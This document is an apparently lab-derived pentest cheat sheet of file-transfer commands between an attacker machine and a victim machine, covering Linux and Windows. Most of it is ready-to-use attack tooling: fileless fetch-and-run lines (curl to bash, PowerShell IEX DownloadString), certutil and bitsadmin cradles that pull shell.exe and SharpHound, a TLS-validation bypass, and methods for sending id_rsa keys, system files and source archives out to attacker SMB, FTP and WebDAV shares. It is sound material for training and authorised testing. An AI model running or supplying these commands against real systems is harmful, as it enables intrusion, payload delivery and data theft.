Wget/Curl
Two of the most common utilities in Linux distributions to interact with web applications are `wget` and `curl`. These tools are installed on many Linux distributions.
python3 -m http.server 8000
wget http://{IP}:8000/LinEnum.sh -O /tmp/LinEnum.sh
curl http://{IP}:8000/LinEnum.sh -o /tmp/LinEnum.sh
nc
Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connection using TCP or UDP. It was released in 1995 and hasn't been maintained despite its popularity. In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine
nc -l -p 8000 > LinEnum.sh
We will connect to the victim machine on port 8000 using netcat and send the LinEnum.sh file as input to netcat. The `-q 0` will tell netcat to close the connection once it finishes. That way, we'll know when the file transfer was complete.
curl http://{IP}:8000/LinEnum.sh | bash
Ncat
The computer networking utility tool Netcat (often abbreviated to nc) was released in 1995 and hasn't been maintained despite its popularity. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.
In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine
The `--recv-only` flag is used to close the connection once the file transfer is finished.
ncat -l -p 8000 --recv-only > LinEnum.sh
The `--send-only` flag is used to cause Ncat to quit when its input runs out.
ncat --send-only {IP} 8000 < LinEnum.sh
SSH
SSH comes with an SCP utility for remote file transfer. We can setup an SSH server on our attacker machine and use the SCP utility to transfer files.
sudo systemctl enable ssh
sudo systemctl start ssh
scp {USER}@{IP}:{FILE_TO_TRANSFER} {FILE_DESTINATION}
scp Administrator@10.10.138.42:/Users/Administrator/20220623131857_loot.zip .
Base64
Base64 encoding and decoding has a very limited file size, but is stealthy becasue it doesn't require network communication. We can encode a file with base64, copy the file to our victim machine and decode the base64 to get our file back.
cat id_rsa |base64 -w 0;echo
echo -n 'LS0tLS1CRU...' | base64 -d
Fileless
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
python3 -m http.server 8000
curl http://{IP}:8000/LinEnum.sh | bash
curl http://{IP}:8000/helloworld.py | python3
PHP
We can use a simple PHP webserver to transfer files
php -S 0.0.0.0:8000
wget http://{IP}:8000/{FILE}
Python2
We can use a simple Python webserver to transfer filess
python2.7 -m SimpleHTTPServer
wget http://{IP}:8000/{FILE}
Python3
WWe can use a simple Python webserver to transfer files
python3 -m http.server 8000
wget http://{IP}:8000/{FILE}
Ruby
We can use a simple Ruby webserver to transfer files
ruby -run -ehttpd . -p8000
wget http://{IP}:8000/{FILE}
Bitsadmin
Used for managing background intelligent transfer
python3 -m http.server 8000
bitsadmin.exe /transfer /Download /priority Foreground http://{IP}/shell.exe c:\Users\thm\Desktop\shell.exe
Certutil
Windows binary used for handling certificates
python3 -m http.server 8000
certutil.exe -urlcache -split -f http://{IP}:8000/sharphound.exe sharphound.exe
FTP
We can setup an FTP server using `pyftpdlib` on our attacker machine to transfer files.
sudo pip3 install pyftpdlib
By default, `pyftpdlib` uses port 2121. We can specify port 21 if prefered.
sudo python3 -m pyftpdlib --port 21
(New-Object Net.WebClient).DownloadFile('ftp://{IP}/file.txt', 'ftp-file.txt')
PowerShell DownloadFile
PowerShell offers many file transfer options. The following methods from the System.Net.WebClient class can be used to download a file over HTTP, HTTPS, or FTP.
python3 -m http.server 8000
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PowerShell WebRequest
From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available, but is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name.
python3 -m http.server 8000
Invoke-WebRequest -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'
wget 'http://{IP}:8000/shell.exe'
curl 'http://{IP}:8000/shell.exe' -o shell.exe
iwr -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'
PowerShell Base64
We can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the file in the original content. This method is not always possible to use. cmd.exe has a maximum string length of 8191 characters. Also, a web shell may error if you attept to send extreamly large strings.
cat id_rsa | base64 -w 0;echo
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1...))
PowerShell Fileless
Fileless attacks work by using some operating system functions to download the payload anad execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.
python3 -m http.server 8000
iex(New-Object Net.WebClient).DownloadString('http://{IP}:8000/shell.exe')
SMB
We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine.
smbserver.py kali .
copy \\{attackerIP}\kali\{file} .
SMB Authenticated
New versions of Windows block unauthenticated guest access. You will receive the following error when trying to copy files from an SMB share in an unauthenticated manner: `You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.`
To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our Windows target machine.
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\192.168.220.133\share /user:test test
copy n:\nc.exe
XFreeRDP
You can mount your drive to the VM and access is from `This PC`
xfreerdp /u:thm /p:Password /v:10.10.123.123 /workspace /home-drive
Explorer Error
When trying to download a file, you may come across the following error: `The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.`
This error is caused due to when Internet Explorer first-launch configuration has not been completed, which prevents the download.
This error can be bypassed with the `-UseBasicParsing` flag.
python3 -m http.server 8000
Invoke-WebRequest https://{IP}/shell.exe -UseBasicParsing | IEX
SSL&TLS Error
When downloading a file, you may come across this error: `Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."`
This error occurs because the certificate is not trusted. We can bypass this error with the following command:
python3 -m http.server 8000
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
FTP
We can use PowerShell or the FTP client to upload files to an FTP server.
Using the Python module `pyftpdlib`, we need to specify the option `--write` to allow clients to upload files to our attacker machine.
sudo python3 -m pyftpdlib --port 21 --write
(New-Object Net.WebClient).UploadFile('ftp://{IP}/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
Base64
We can use base64 to encode a file and copy the base64 to our attacker machine to decode it.
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
echo IyBDb3B5cm... | base64 -d
SMB
We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine and upload file to it.
smbserver.py -smb2support test $(pwd)
copy {FILE_TO_COPY} \\{ATTACKER_IP}\test
SMB over HTTP
Companies usually allow outbound traffic using HTTP (TCP/80) and HTTPS (TCP/443) protocols. Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.
An alternative is to run SMB over HTTP with WebDAV. WebDAV is an extension of HTTP, the protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.
When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.
To setup our WebDAV server, we need to install two Python modules, `wsgidav` and `cheroot`.
sudo pip install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connect to the WebDAV share.
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\